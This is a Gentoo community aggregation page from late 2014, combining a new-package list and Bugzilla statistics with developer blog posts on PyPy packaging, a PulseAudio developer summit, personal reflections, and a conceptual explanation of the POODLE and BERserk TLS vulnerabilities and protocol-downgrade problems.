dev-perl/LaTeX-Table dilfridge 14 Oct 2014
virtual/perl-Term-ReadLine dilfridge 14 Oct 2014
dev-python/python-etcd zmedico 15 Oct 2014
dev-db/etcd zmedico 15 Oct 2014
dev-libs/extra-cmake-modules kensington 15 Oct 2014
kde-frameworks/kglobalaccel kensington 15 Oct 2014
kde-frameworks/kwallet kensington 15 Oct 2014
kde-frameworks/kjobwidgets kensington 15 Oct 2014
kde-frameworks/kxmlgui kensington 15 Oct 2014
kde-frameworks/plasma kensington 15 Oct 2014
kde-frameworks/kcrash kensington 15 Oct 2014
kde-frameworks/kdesignerplugin kensington 15 Oct 2014
kde-frameworks/frameworkintegration kensington 15 Oct 2014
kde-frameworks/kf-env kensington 15 Oct 2014
kde-frameworks/kdesu kensington 15 Oct 2014
kde-frameworks/ki18n kensington 15 Oct 2014
kde-frameworks/kitemmodels kensington 15 Oct 2014
kde-frameworks/kguiaddons kensington 15 Oct 2014
kde-frameworks/knewstuff kensington 15 Oct 2014
kde-frameworks/kcoreaddons kensington 15 Oct 2014
kde-frameworks/kapidox kensington 15 Oct 2014
kde-frameworks/kactivities kensington 15 Oct 2014
kde-frameworks/kdelibs4support kensington 15 Oct 2014
kde-frameworks/kcmutils kensington 15 Oct 2014
kde-frameworks/sonnet kensington 15 Oct 2014
kde-frameworks/kconfig kensington 15 Oct 2014
kde-frameworks/kidletime kensington 15 Oct 2014
kde-frameworks/kunitconversion kensington 15 Oct 2014
kde-frameworks/kio kensington 15 Oct 2014
kde-frameworks/kdbusaddons kensington 15 Oct 2014
kde-frameworks/kconfigwidgets kensington 15 Oct 2014
kde-frameworks/kauth kensington 15 Oct 2014
kde-frameworks/kcompletion kensington 15 Oct 2014
kde-frameworks/kcodecs kensington 15 Oct 2014
kde-frameworks/kpty kensington 15 Oct 2014
kde-frameworks/solid kensington 15 Oct 2014
kde-frameworks/kplotting kensington 15 Oct 2014
kde-frameworks/kbookmarks kensington 15 Oct 2014
kde-frameworks/knotifyconfig kensington 15 Oct 2014
kde-frameworks/kemoticons kensington 15 Oct 2014
kde-frameworks/kinit kensington 15 Oct 2014
kde-frameworks/kross kensington 15 Oct 2014
kde-frameworks/kwidgetsaddons kensington 15 Oct 2014
kde-frameworks/kimageformats kensington 15 Oct 2014
kde-frameworks/kdewebkit kensington 15 Oct 2014
kde-frameworks/kdeclarative kensington 15 Oct 2014
kde-frameworks/attica kensington 15 Oct 2014
kde-frameworks/kservice kensington 15 Oct 2014
kde-frameworks/kiconthemes kensington 15 Oct 2014
kde-frameworks/kdnssd kensington 15 Oct 2014
kde-frameworks/kmediaplayer kensington 15 Oct 2014
kde-frameworks/knotifications kensington 15 Oct 2014
kde-frameworks/kded kensington 15 Oct 2014
kde-frameworks/kjsembed kensington 15 Oct 2014
kde-frameworks/kjs kensington 15 Oct 2014
kde-frameworks/ktexteditor kensington 15 Oct 2014
kde-frameworks/kdoctools kensington 15 Oct 2014
kde-frameworks/krunner kensington 15 Oct 2014
kde-frameworks/kitemviews kensington 15 Oct 2014
kde-frameworks/karchive kensington 15 Oct 2014
kde-frameworks/khtml kensington 15 Oct 2014
kde-frameworks/kwindowsystem kensington 15 Oct 2014
kde-frameworks/kparts kensington 15 Oct 2014
kde-frameworks/ktextwidgets kensington 15 Oct 2014
kde-frameworks/threadweaver kensington 15 Oct 2014
kde-base/oxygen-fonts kensington 15 Oct 2014
dev-libs/sni-qt mrueg 15 Oct 2014
dev-db/etcdctl zmedico 15 Oct 2014
dev-db/go-etcd zmedico 16 Oct 2014
sys-fs/etcd-fs zmedico 16 Oct 2014
dev-python/mamba alunduil 16 Oct 2014
virtual/podofo-build zmedico 16 Oct 2014
dev-games/goatee hasufell 16 Oct 2014
games-board/goatee-gtk hasufell 16 Oct 2014
app-crypt/etcd-ca zmedico 16 Oct 2014
dev-python/expects alunduil 17 Oct 2014
app-emacs/rust-mode jauhien 18 Oct 2014
app-vim/rust-mode jauhien 18 Oct 2014
app-shells/rust-zshcomp jauhien 18 Oct 2014
dev-lang/rust-bin jauhien 18 Oct 2014
dev-python/args alunduil 18 Oct 2014
sys-process/xjobs mjo 19 Oct 2014
dev-python/parse-type alunduil 19 Oct 2014
dev-perl/Devel-CheckCompiler dilfridge 19 Oct 2014
dev-perl/Cwd-Guard dilfridge 19 Oct 2014
dev-perl/Module-Build-XSUtil dilfridge 19 Oct 2014
dev-perl/File-Find-Rule-Perl dilfridge 19 Oct 2014
dev-perl/PPI-PowerToys dilfridge 19 Oct 2014
dev-util/jenkins-bin mrueg 20 Oct 2014
dev-python/sphinxcontrib-cheeseshop alunduil 21 Oct 2014
dev-perl/BZ-Client dilfridge 21 Oct 2014
dev-perl/Data-Serializer dilfridge 21 Oct 2014
dev-perl/Math-NumberCruncher dilfridge 21 Oct 2014
dev-python/behave alunduil 22 Oct 2014
dev-python/django-opensearch ercpe 22 Oct 2014
app-admin/lastpass-cli zx2c4 22 Oct 2014
dev-python/simpleeval cedk 22 Oct 2014
net-misc/xrdp mgorny 23 Oct 2014
dev-libs/collada-dom aballier 23 Oct 2014
sci-libs/libccd aballier 23 Oct 2014
dev-ml/ocaml-re aballier 24 Oct 2014
dev-ml/cudf aballier 24 Oct 2014
dev-perl/File-ShareDir-Install dilfridge 24 Oct 2014
dev-perl/POSIX-strftime-Compiler dilfridge 24 Oct 2014
dev-perl/Apache-LogFormat-Compiler dilfridge 24 Oct 2014
dev-python/doublex-expects alunduil 25 Oct 2014
app-crypt/libu2f-host flameeyes 25 Oct 2014
app-crypt/libykneomgr flameeyes 25 Oct 2014
app-crypt/yubikey-neo-manager flameeyes 25 Oct 2014
dev-perl/Redis dilfridge 25 Oct 2014
dev-perl/Types-Serialiser dilfridge 25 Oct 2014
net-analyzer/ospd jlec 26 Oct 2014
dev-perl/Cache-FastMmap dilfridge 26 Oct 2014
dev-python/dockerpty alunduil 27 Oct 2014
app-text/restview radhermit 27 Oct 2014
dev-ml/parmap aballier 27 Oct 2014
dev-ml/camlbz2 aballier 27 Oct 2014
net-misc/x11rdp mgorny 27 Oct 2014
app-emulation/fig alunduil 27 Oct 2014
dev-perl/Algorithm-ClusterPoints dilfridge 27 Oct 2014
dev-ml/dose3 aballier 28 Oct 2014
x11-libs/libQGLViewer aballier 28 Oct 2014
dev-ml/cmdliner aballier 29 Oct 2014
dev-ml/uutf aballier 29 Oct 2014
dev-ml/jsonm aballier 29 Oct 2014
dev-ml/opam aballier 29 Oct 2014
sci-libs/octomap aballier 29 Oct 2014
app-text/regex idella4 29 Oct 2014
dev-python/regex idella4 29 Oct 2014
games-rpg/soltys calchan 30 Oct 2014
sci-libs/orocos_kdl aballier 30 Oct 2014
dev-cpp/metslib aballier 31 Oct 2014
media-libs/libsixel hattya 31 Oct 2014
app-crypt/libscrypt blueness 31 Oct 2014
sec-policy/selinux-android swift 31 Oct 2014

Bugzilla

The Gentoo community uses Bugzilla to record and track bugs, notifications, suggestions and other interactions with the development team.

Activity

The following tables and charts summarize the activity on Bugzilla between 01 October 2014 and 01 November 2014. Not fixed means bugs that were resolved as NEEDINFO, WONTFIX, CANTFIX, INVALID or UPSTREAM.

Bug Activity Number
New 1881
Closed 1153
Not fixed 171
Duplicates 168
Total 6198
Blocker 4
Critical 18
Major 65

Closed bug ranking

The following table outlines the teams and developers with the most bugs resolved during this period

Rank Team/Developer Bug Count
1 Gentoo Linux Gnome Desktop Team 50
2 Gentoo Perl team 43
3 Gentoo Games 42
4 Gentoo KDE team 39
5 Gentoo's Team for Core System packages 39
6 Netmon Herd 32
7 Python Gentoo Team 27
8 PHP Bugs 25
9 Gentoo Toolchain Maintainers 21
10 Others 834


Assigned bug ranking

The developers and teams who have been assigned the most bugs during this period are as follows.

Rank Team/Developer Bug Count
1 Gentoo Linux bug wranglers 107
2 Gentoo Linux Gnome Desktop Team 69
3 Gentoo's Team for Core System packages 65
4 Gentoo Security 58
5 Gentoo KDE team 53
6 Python Gentoo Team 49
7 Gentoo Games 47
8 Gentoo Perl team 44
9 Default Assignee for New Packages 43
10 Others 1345


 

Heard in the community

Send us your favorite Gentoo script or tip at gmn@gentoo.org

Getting Involved?

Interested in helping out? The GMN relies on volunteers and members of the community for content every month. If you are interested in writing for the GMN or thinking of another way to contribute, please send an e-mail to gmn@gentoo.org.

Comments or Suggestions?

Please head over to this forum post.

November 12, 2014
Nathan Zachary a.k.a. nathanzachary (homepage, bugs)
Veteran’s Day is one of uncertainty (November 12, 2014, 03:17 UTC)

Today, 11 November, is an interesting holiday in the United States. It is the day in which we honour those individuals who have served in the armed forces and have defended their country. I say that it is an interesting holiday because I am torn on how I feel about the entire concept. On one hand, I am incredibly grateful for those people that have fought to defend the principles and freedoms on which the United States was founded. However, the fight itself is one that I cannot condone.

There is no flag large enough to cover the shame of killing innocent people

Threats to freedom in any nation are brought about by political groups, and should be handled in a political manner. I understand that my viewpoint here is one of pseudoutopian cosmography, but it is one that I hope will become more and more realistic as both time and humanity march onward. The “wars” should be fought by national leaders, and done so via discussion and debate; not by citizens (military or civilian) via guns, bombs, or other weaponry.

I also understand that there will be many people who disagree (in degrees that result in emotions ranging from mild irritation to infuriated hostility) with my viewpoint, and that is completely fine. Again, my dilemma comes from being simultaneously thankful for those individuals who have given their all to defend “freedom” (whatever concept that word may represent) and sorrowful that they were the ones that had to give anything at all. These men and women had to leave their families knowing that they may never return to them; knowing that they may die trying to defend something that shouldn’t be challenged in the first place—human freedoms.

Little boy looking at his veteran father
Who will explain it to him?

Let us not forget a quote by former President of the United States, John F. Kennedy who stated that “mankind must put an end to war before war puts an end to mankind.”

–Zach

November 10, 2014
Andreas K. Hüttel a.k.a. dilfridge (homepage, bugs)

Today's good news is that our manuscript "Thermally induced subgap features in the cotunneling spectroscopy of a carbon nanotube" has been accepted for publication by New Journal of Physics.
In a way, this work builds directly on our previous publication on thermally induced quasiparticles in niobium-carbon nanotube hybrid systems. As a contribution mainly from our theory colleagues, the modelling of transport processes is now enhanced and extended to cotunneling processes within Coulomb blockade. A generalized master equation based on the reduced density matrix approach in the charge conserved regime is derived, applicable to any strength of the intradot interaction and to finite values of the superconducting gap.
We show both theoretically and experimentally that distinct thermal "replica lines", due to the finite quasiparticle occupation of the superconductor, also occur in cotunneling spectroscopy at higher temperatures T~1K: the now-possible transport processes lead to additional conductance both at zero bias and at a finite voltage corresponding to an excitation energy; experiment and theoretical result match very well.

"Thermally induced subgap features in the cotunneling spectroscopy of a carbon nanotube"
S. Ratz, A. Donarini, D. Steininger, T. Geiger, A. Kumar, A. K. Hüttel, Ch. Strunk, and M. Grifoni
accepted for publication by New Journal of Physics, arXiv:1408.5000 (PDF)

November 09, 2014
Michał Górny a.k.a. mgorny (homepage, bugs)
PyPy is back, and for real this time! (November 09, 2014, 23:17 UTC)

As you may recall, I was looking for a dedicated PyPy maintainer for quite some time. Sadly, all the people who helped (and who I’d like to thank a lot) ended up lacking time soon enough. So finally I’ve decided to look into the hacks reducing build-time memory use and take care of the necessary ebuild and packaging work myself.

So first of all, you may notice that the new PyPy (source-code) ebuilds have a new USE flag called low-memory. When this flag is enabled, the translation process is done using PyPy with some memory-reducing adjustments suggested by upstream. The net result is that it finally is possible to build PyPy with 3.5G RAM (on amd64) and 1G of swap (the latter being used once the compiler is spawned and the memory used during translation is no longer necessary), at the cost of slightly increased build time.

As noted above, the low-memory option requires using PyPy to perform the translation. So while having to enforce that, I went a bit further and made the ebuild default to using PyPy whenever available. In fact, even for a first PyPy build you are recommended to install dev-python/pypy-bin first and let the ebuild use it to bootstrap your own PyPy.
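In practice that bootstrap can look something like this (package names as in the tree, USE flag as described above):

# install the prebuilt PyPy first, then let it translate the source build
emerge -av dev-python/pypy-bin
USE="low-memory" emerge -av dev-python/pypy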

Next, I have cleaned up the ebuilds a bit and enforced more consistency. Changing maintainers and binary package builders had resulted in the ebuilds being a bit inconsistent. Now you can finally expect pypy-bin to install exactly the same set of files as a source-built pypy.

I have also cleaned up the remaining libpypy-c symlinks. The library is not packaged upstream currently, and therefore has no proper public name. Using libpypy-c.so is just wrong, and packages can't reliably refer to it. I'd rather wait with installing it until there's some precedent for naming it. The shared library is still built, but it's kept inside the PyPy home directory.

All those changes were followed by a proper version bump to 2.4.0. While you still may have issues upgrading PyPy, Zac already committed a patch to Portage and the next release should be able to handle PyPy upgrades seamlessly. I have also built all the supported binary package variants, so you can choose those if you don’t want to spend time building PyPy.

Finally, I have added the ebuilds for PyPy 3. They are a little bit more complex than regular PyPy, especially because the build process and some of the internal modules still require Python 2. Sadly, PyPy 3 is based on Python 3.2 with small backports, so I don’t expect package compatibility much greater than CPython 3.2 had.

If you want to try building some packages with PyPy 3, you can use the convenience PYTHON_COMPAT_OVERRIDE hack:

PYTHON_COMPAT_OVERRIDE='pypy3' emerge -1v mypackage

Please note that it is only a hack, and as such it doesn’t set proper USE flags (PYTHON_TARGETS are simply ignored) or enforce dependencies.

If someone wants to help PyPy on Gentoo a bit, there are still unsolved issues needing a lot of specialist work. More specifically:

  1. #465546; PyPy needs to be modified to support a /usr prefix properly (right now, it requires the prefix to be /usr/lib*/pypy, which breaks distutils packages assuming otherwise).
  2. #525940; non-SSE2 JIT does not build.
  3. #429372; we lack proper sandbox install support.

Patrick Lauer a.k.a. bonsaikitten (homepage, bugs)
gentooJoin 2004/04/11 (November 09, 2014, 11:06 UTC)

How time flies!
gentooJoin: 2004/04/11

Now I feel ooold

November 05, 2014
Patrick Lauer a.k.a. bonsaikitten (homepage, bugs)
Just a simple webapp, they said ... (November 05, 2014, 08:38 UTC)

The complexity of modern software is quite insanely insane. I just realized ...
Writing a small webapp with flask, I've had to deal with the following technologies/languages:

  • System package manager, in this case portage
  • SQL DBs, both SQLite (local testing) and PostgreSQL (production)
  • python/flask, the core of this webapp
  • jinja2, the template language usually used with it
  • HTML, because the templates don't just appear magically
  • CSS (mostly hidden in Bootstrap) to make it look sane
  • JavaScript, because dynamic shizzle
  • (flask-)sqlalchemy, ORMs are easier than writing SQL by hand when you're in a hurry
  • alembic, for DB migrations and updates
  • git, because version control
So that's about a dozen things that each would take years to master. And for a 'small' project there's not much time to learn them deeply, so we staple together what we can, learning as we go along ...

And there's an insane amount of context switching going on, you go from mangling CSS to rewriting SQL in the span of a few minutes. It's an impressive polyglot marathon, but how is this supposed to generate sustainable and high-quality results?

And then I go home in the evening and play around with OpenCL and such things. Learning never ends - but how are we going to build things that last for more than 6 months? Too many moving parts, too much change, and never enough time to really understand what we're doing :)

November 04, 2014
Arun Raghavan a.k.a. ford_prefect (homepage, bugs)
Notes from the PulseAudio Mini Summit 2014 (November 04, 2014, 16:49 UTC)

The third week of October was quite action-packed, with a whole bunch of conferences happening in Düsseldorf. The Linux audio developer community as well as the PulseAudio developers each had a whole day of discussions related to a wide range of topics. I’ll be summarising the events of the PulseAudio mini summit day here. The discussion was split into two parts, the first half of the day with just the current core developers and the latter half with members of the community participating as well.

I’d like to thank the Linux Foundation for sparing us a room to carry out these discussions — it’s fantastic that we are able to colocate such meetings with a bunch of other conferences, making it much easier than it would otherwise be for all of us to converge to a single place, hash out ideas, and generally have a good time in real life as well!

Incontrovertible proof that all our users are happy

Happy faces — incontrovertible proof that everyone loves PulseAudio!

With a whole day of discussions, this is clearly going to be a long post, so you might want to grab a coffee now. :)

Release plan

We have a few blockers for 6.0, and some pending patches to merge (mainly HSP support). Once this is done, we can proceed to our standard freeze → release candidate → stable process.

Build simplification for BlueZ HFP/HSP backends

For simplifying packaging, it would be nice to be able to build all the available BlueZ module backends in one shot. There wasn’t much opposition to this idea, and David (Henningsson) said he might look at this. (as I update this before posting, he already has)

srbchannel plans

We briefly discussed plans around the recently introduced shared ringbuffer channel code for communication between PulseAudio clients and the server. We talked about the performance benefits, and future plans such as direct communication between the client and server-side I/O threads.

Routing framework patches

Tanu (Kaskinen) has a long-standing set of patches to add a generic routing framework to PulseAudio, developed by notably Jaska Uimonen, Janos Kovacs, and other members of the Tizen IVI team. This work adds a set of new concepts that we’ve not been entirely comfortable merging into the core. To unblock these patches, it was agreed that doing this work in a module and using a protocol extension API would be more beneficial. (Tanu later did a demo of the CLI extensions that have been made for the new routing concepts)

module-device-manager

As a consequence of the discussion around the routing framework, David mentioned that he'd like to take forward Colin's priority list work in the mean time. Based on our discussions, it looked like it would be possible to extend module-device-manager to make it port aware and get the kind of functionality we want (the ability to have a priority-ordered list of devices). David was to look into this.

Module writing infrastructure

Relatedly, we discussed the need to export the PA internal headers to allow externally built modules. We agreed that this would be okay to have if it was made abundantly clear that this API would have absolutely no stability guarantees, and is mostly meant to simplify packaging for specialised distributions.

Which led us to the other bit of infrastructure required to write modules more easily — making our protocol extension mechanism more generic. Currently, we have a static list of protocol extensions in our core. Changing this requires exposing our pa_tagstruct structure as public API, which we haven’t done. If we don’t want to do that, then we would expose a generic “throw this blob across the protocol” mechanism and leave it to the module/library to take care of marshalling/unmarshalling.

Resampler quality evaluation

Alexander shared a number of his findings about resampler quality on PulseAudio, vs. those found on Windows and Mac OS. Some questions were asked about other parameters, such as relative CPU consumption, etc. There was also some discussion on how to try to carry this work to a conclusion, but no clear answer emerged.

It was also agreed on the basis of this work that support for libsamplerate and ffmpeg could be phased out after deprecation.

Addition of a “hi-fi” mode

The discussion came around to the possibility of having a mode where (if the hardware supports it) PulseAudio just plays out samples without resampling, conversion, etc. This has been brought up in the past for "audiophile" use cases where the card supports 88.2/96 kHz and higher sample rates.

No objections were raised to having such a mode — I’d like to take this up at some point of time.

LFE channel module

Alexander has some code for filtering low frequencies for the LFE channel, currently as a virtual sink, that could eventually be integrated into the core.

rtkit

David raised a question about the current status of rtkit and whether it needs to exist, and if so, where. Lennart brought up the fact that rtkit currently does not work on systemd+cgroups based setups (I don’t seem to have why in my notes, and I don’t recall off the top of my head).

The conclusion of the discussion was that some alternate policy method for deciding RT privileges, possibly within systemd, would be needed, but for now rtkit should be used (and fixed!)

kdbus/memfd

Discussions came up about the possibility of using kdbus and/or memfd for the PulseAudio transport. This is interesting to me; there doesn't seem to be an immediately clear benefit over our SHM mechanism in terms of performance, and some work to evaluate how this could be used, and what the benefit would be, needs to be done.

ALSA controls spanning multiple outputs

David has now submitted patches for controls that affect multiple outputs (such as “Headphone+LO”). These are currently being discussed.

Audio groups

Tanu would like to add code to support collecting audio streams into “audio groups” to apply collective policy to them. I am supposed to help review this, and Colin mentioned that module-stream-restore already uses similar concepts.

Stream and device objects

Tanu proposed the addition of new objects to represent streams and devices. There didn’t seem to be consensus on adding these, but there was agreement on a clear need to consolidate common code from sink-input/source-output and sink/source implementations. The idea was that having a common parent object for each pair might be one way to do this. I volunteered to help with this if someone’s taking it up.

Filter sinks

Alexander brought up the need for a filter API in PulseAudio, and this is something I really would like to have. I am supposed to sketch out an API (though implementing this is non-trivial and will likely take time).

Dynamic PCM for HDMI

David plans to see if we can use profile availability to help determine when an HDMI device is actually available.

Browser volumes

The usability of flat-volumes for browser use cases (where the volume of streams can be controlled programmatically) was discussed, and my patch to allow optional opt-out by a stream from participating in flat volumes came up. Tanu and I are to continue the discussion already on the mailing list to come up with a solution for this.

Handling bad rewinding code

Alexander raised concerns about the quality of rewinding code in some of our filter modules. The agreement was that we needed better documentation on handling rewinds, including how to explicitly not allow rewinds in a sink. The example virtual sink/source code also needs to be adjusted accordingly.

BlueZ native backend

Wim Taymans’ work on adding back HSP support to PulseAudio came up. Since the meeting, I’ve reviewed and merged this code with the change we want. Speaking to Luiz Augusto von Dentz from the BlueZ side, something we should also be able to add back is for PulseAudio to act as an HSP headset (using the same approach as for HSP gateway support).

Containers and PA

Takashi Iwai raised a question about what a good way to run PA in a container was. The suggestion was that a tunnel sink would likely be the best approach.

Common ALSA configuration

Based on discussion from the previous day at the Linux Audio mini-summit, I’m supposed to look at the possibility of consolidating the various mixer configuration formats we currently have to deal with (primarily UCM and its implementations, and Android’s XML format).

(thanks to Tanu, David and Peter for reviewing this)

November 03, 2014
Hanno Böck a.k.a. hanno (homepage, bugs)

The latest SSL attack was called POODLE.
The world of SSL/TLS Internet encryption is in trouble again. You may have heard that recently a new vulnerability called POODLE has been found in the ancient SSLv3 protocol. Shortly before another vulnerability that's called BERserk has been found (which hasn't received the attention it deserved because it was published on the same day as Shellshock).
I think it is crucial to understand what led to these vulnerabilities. I find POODLE and BERserk so interesting because these two vulnerabilities were both unnecessary and could've been avoided by intelligent design choices. Okay, let's start by investigating what went wrong.

The mess with CBC

POODLE (Padding Oracle On Downgraded Legacy Encryption) is a weakness in the CBC block mode and the padding of the old SSL protocol. If you've followed previous stories about SSL/TLS vulnerabilities this shouldn't be news. There have been a whole number of CBC-related vulnerabilities, most notably the Padding oracle (2003), the BEAST attack (2011) and the Lucky Thirteen attack (2013) (Lucky Thirteen is kind of my favorite, because it was already more or less mentioned in the TLS 1.2 standard). The POODLE attack builds on ideas already used in previous attacks.

CBC is a so-called block mode. For now it should be enough to understand that we have two kinds of ciphers we use to authenticate and encrypt connections – block ciphers and stream ciphers. Block ciphers need a block mode to operate. There's nothing necessarily wrong with CBC, it's the way CBC is used in SSL/TLS that causes problems. There are two weaknesses in it: Early versions (before TLS 1.1) use a so-called implicit Initialization Vector (IV) and they use a method called MAC-then-Encrypt (used up until the very latest TLS 1.2, but there's a new extension to fix it) which turned out to be quite fragile when it comes to security. The CBC details would be a topic on their own and I won't go into the details now. The long-term goal should be to get rid of all these (old-style) CBC modes, however that won't be possible for quite some time due to compatibility reasons. As most of these problems have been known since 2003 it's about time.

The evil Protocol Dance

The interesting question with POODLE is: Why does a security issue in an ancient protocol like SSLv3 bother us at all? SSL was developed by Netscape in the mid 90s; it has two public versions: SSLv2 and SSLv3. In 1999 (15 years ago) the old SSL was deprecated and replaced with TLS 1.0 (https://tools.ietf.org/html/rfc2246), standardized by the IETF. Now people still used SSLv3 up until very recently, mostly for compatibility reasons. But even that in itself isn't the problem. SSL/TLS has a mechanism to safely choose the best protocol available. In a nutshell it works like this:

a) A client (e. g. a browser) connects to a server and may say something like "I want to connect with TLS 1.2"
b) The server may answer "No, sorry, I don't understand TLS 1.2, can you please connect with TLS 1.0?"
c) The client says "Ok, let's connect with TLS 1.0"

The point here is: Even if both server and client support the ancient SSLv3, they'd usually not use it. But this is the idealized world of standards. Now welcome to the real world, where things like this happen:

a) A client (e. g. a browser) connects to a server and may say something like "I want to connect with TLS 1.2"
b) The server thinks "Oh, TLS 1.2, never heard of that. What should I do? I better say nothing at all..."
c) The browser thinks "Ok, server doesn't answer, maybe we should try something else. Hey, server, I want to connect with TLS 1.1"
d) The browser will retry all SSL versions down to SSLv3 till it can connect.

The Protocol Dance is a Dance with the Devil.
So here's our problem: There are broken servers out there that don't answer at all if they see a connection attempt with an unknown protocol. The well known SSL test by Qualys checks for this behaviour and calls it "Protocol intolerance" (but "Protocol brokenness" would be more precise). When the connection fails the browsers will try all the old protocols they know until they can connect. This behaviour is now known as the "Protocol Dance" - and it causes all kinds of problems.
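
To make the mechanism concrete, here is a purely illustrative sketch of that fallback logic; none of this is real browser code, and the function and constant names are made up for the example:

#include <stdio.h>

/* Illustrative sketch of the "Protocol Dance": on *any* handshake failure the
 * client falls back to the next older protocol version. An active attacker
 * only has to kill the first attempts to force the connection down to SSLv3. */
enum proto { SSL3, TLS1_0, TLS1_1, TLS1_2 };
static const enum proto try_order[] = { TLS1_2, TLS1_1, TLS1_0, SSL3 };
static const char *names[] = { "SSLv3", "TLS 1.0", "TLS 1.1", "TLS 1.2" };

/* stub: pretend an attacker drops everything newer than SSLv3 */
static int handshake(enum proto p) { return p == SSL3; }

int main(void) {
    for (unsigned i = 0; i < 4; i++) {
        if (handshake(try_order[i])) {
            printf("connected with %s\n", names[try_order[i]]);
            return 0;
        }
        printf("%s failed, falling back...\n", names[try_order[i]]);
    }
    return 1;
}

The SCSV mechanism mentioned further down is essentially a way for the client to signal to the server that this kind of fallback retry is happening, so that a server which does support the newer version can abort it.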

I first encountered the Protocol Dance back in 2008. Back then I already used a technology called SNI (Server Name Indication) that allows you to have multiple websites with multiple certificates on a single IP address. I regularly got complaints from people who saw the wrong certificates on those SNI webpages. A bug report to Firefox and some analysis revealed the reason: The protocol downgrades don't just happen when servers don't answer to new protocol requests, they also can happen on faulty or weak internet connections. SSLv3 does not support SNI, so when a downgrade to SSLv3 happens you get the wrong certificate. This was quite frustrating: A compatibility feature that was purely there to support broken hardware caused my completely legit setup to fail every now and then.

But the more severe problem is this: The Protocol Dance will allow an attacker to force downgrades to older (less secure) protocols. He just has to stop connection attempts with the more secure protocols. And this is why the POODLE attack was an issue after all: The problem was not backwards compatibility. The problem was attacker-controlled backwards compatibility.

The idea that the Protocol Dance might be a security issue wasn't completely new either. At the Black Hat conference this year Antoine Delignat-Lavaud presented a variant of an attack he calls "Virtual Host Confusion" where he relied on downgrading connections to force SSLv3 connections.

"Whoever breaks it first“ - principle

The Protocol Dance is an example of something that I feel is an unwritten rule of browser development today: Browser vendors don't want things to break – even if the breakage is the fault of someone else. So they add all kinds of compatibility technologies that are purely there to support broken hardware. The idea is: When someone introduced broken hardware at some point – and it worked because the brokenness wasn't triggered at that point – the broken stuff is allowed to stay and all others have to deal with it.

To avoid the Protocol Dance a new feature is now on its way: It's called SCSV and the idea is that the Protocol Dance is stopped if both the server and the client support this new protocol feature. I'm extremely uncomfortable with that solution because it just adds another layer of duct tape and increases the complexity of TLS which already is much too complex.

There's another recent example which is very similar: At some point people found out that BIG-IP load balancers by the company F5 had trouble with TLS connection attempts larger than 255 bytes. However it was later revealed that connection attempts bigger than 512 bytes also succeed. So a padding extension was invented and it's now widespread behaviour of TLS implementations to avoid connection attempts between 256 and 511 bytes. To make matters completely insane: It was later found out that there is other broken hardware – SMTP servers by Ironport – that breaks when the handshake is larger than 511 bytes.

I have a principle when it comes to fixing things: Fix it where it's broken. But the browser world works differently. It works with the "whoever breaks it first defines the new standard of brokenness" principle. This is partly due to an unhealthy competition between browsers. Unfortunately they often don't compete very well on the security level. What you'll constantly hear is that browsers can't break any webpages because that will lead to people moving to other browsers.

I'm not sure if I entirely buy this kind of reasoning. For a couple of months the support for the ftp protocol in Chrome / Chromium has been broken. I'm no fan of plain, unencrypted ftp and its only legit use case – unauthenticated file download – can just as easily be fulfilled with unencrypted http, but there are a number of live ftp servers that implement a legit and working protocol. I like Chromium and it's my everyday browser, but for a while the broken ftp support was the most prevalent reason I tended to start Firefox. This little episode makes it hard for me to believe that they can't break connections to some (broken) ancient SSL servers. (I just noted that the very latest version of Chromium has fixed ftp support again.)

BERserk, small exponents and PKCS #1 1.5

We have a problem with weak keys.
Okay, now let's talk about the other recent TLS vulnerability: BERserk. Independently Antoine Delignat-Lavaud and researchers at Intel found this vulnerability which affected NSS (and thus Chrome and Firefox), CyaSSL, some unreleased development code of OpenSSL and maybe others.

BERserk is actually a variant of a quite old vulnerability (you may begin to see a pattern here): The Bleichenbacher attack on RSA first presented at Crypto 2006. Now here things get confusing, because the cryptographer Daniel Bleichenbacher found two independent vulnerabilities in RSA. One in the RSA encryption in 1998 and one in RSA signatures in 2006, for convenience I'll call them BB98 (encryption) and BB06 (signatures). Both of these vulnerabilities expose faulty implementations of the old RSA standard PKCS #1 1.5. And both are what I like to call "zombie vulnerabilities“. They keep coming back, no matter how often you try to fix them. In April the BB98 vulnerability was re-discovered in the code of Java and it was silently fixed in OpenSSL some time last year.

But BERserk is about the other one: BB06. BERserk exposes the fact that inside the RSA function an algorithm identifier for the used hash function is embedded and it's encoded with BER. BER is part of ASN.1. I could tell horror stories about ASN.1, but I'll spare you that for now, maybe this is a topic for another blog entry. It's enough to know that it's a complicated format and this is what bites us here: With some trickery in the BER encoding one can add further data into the RSA function – and in certain situations this allows an attacker to create forged signatures.

One thing should be made clear: Both the original BB06 attack and BERserk are flaws in the implementation of PKCS #1 1.5. If you do everything correctly then you're fine. These attacks exploit the relatively simple structure of the old PKCS standard and they only work when RSA is done with a very small exponent. RSA public keys consist of two large numbers: the modulus N (which is a product of two large primes) and the exponent.

In his presentation at Crypto 2006 Daniel Bleichenbacher already proposed what would have prevented this attack: Just don't use RSA keys with very small exponents like three. This advice also went into various recommendations (e. g. by NIST) and today almost everyone uses 65537 (the reason for this number is that due to its binary structure calculations with it are reasonably fast).

There's just one problem: A small number of keys are still out there that use the exponent e=3. And six of them are used by root certificates installed in every browser. These root certificates are the trust anchor of TLS (which in itself is a problem, but that's another story). Here's our problem: As long as there is one single root certificate with e=3, with such an attack you can create as many fake certificates as you want. If we had deprecated e=3 keys BERserk would've been mostly a non-issue.

There is one more aspect of this story: What's this PKCS #1 1.5 thing anyway? It's an old standard for RSA encryption and signatures. I want to quote Adam Langley on the PKCS standards here: "In a modern light, they are all completely terrible. If you wanted something that was plausible enough to be widely implemented but complex enough to ensure that cryptography would forever be hamstrung by implementation bugs, you would be hard pressed to do better."

Now there's a successor to the PKCS #1 1.5 standard: PKCS #1 2.1, which is based on technologies called PSS (Probabilistic Signature Scheme) and OAEP (Optimal Asymmetric Encryption Padding). It's from 2002 and in many aspects it's much better. I am kind of a fan here, because I wrote my thesis about this. There's just one problem: Although already standardized in 2002, people still prefer to use the much weaker old PKCS #1 1.5. TLS doesn't have any way to use the newer PKCS #1 2.1 and even the current drafts for TLS 1.3 stick to the older - and weaker - variant.

What to do

I would take bets that POODLE wasn't the last TLS/CBC-issue we saw and that BERserk wasn't the last variant of the BB06-attack. Basically, I think there are a number of things TLS implementers could do to prevent further similar attacks:

* The Protocol Dance should die. Don't put another layer of duct tape around it (SCSV), just get rid of it. It will break a small number of already broken devices, but that is a reasonable price for avoiding the next protocol downgrade attack scenario. Backwards compatibility shouldn't compromise security.
* More generally, I think the workarounds for broken devices have to stop. Replace the "whoever broke it first" paradigm with a "fix it where it's broken" paradigm. That also means I think the padding extension should be scrapped.
